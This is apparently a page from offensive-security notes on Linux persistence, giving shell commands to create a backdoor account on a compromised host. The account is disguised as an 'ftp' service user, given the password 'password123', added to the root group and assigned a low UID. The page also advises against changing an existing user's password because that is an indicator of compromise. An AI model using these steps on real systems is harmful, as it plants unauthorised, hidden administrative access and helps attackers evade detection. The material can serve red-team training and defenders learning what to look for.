search

Adding backdoor user

hashtag
Persistence

  • Create a backdoor user with administrative privileges that can be used to access the target system via SSH

shell
whoami
	root
cat /etc/passwd
# Create a user that looks like a service account
# and add it to "root group"
useradd -m ftp -s /bin/bash
passwd ftp
	password123
usermod -aG root ftp
usermod -u 15 ftp
groups ftp
	ftp : ftp root

❗ Changing user's password is a strong indicator of compromise, it should not be done.

PreviousLinux PersistenceNextSSHkey persistence module

Last updated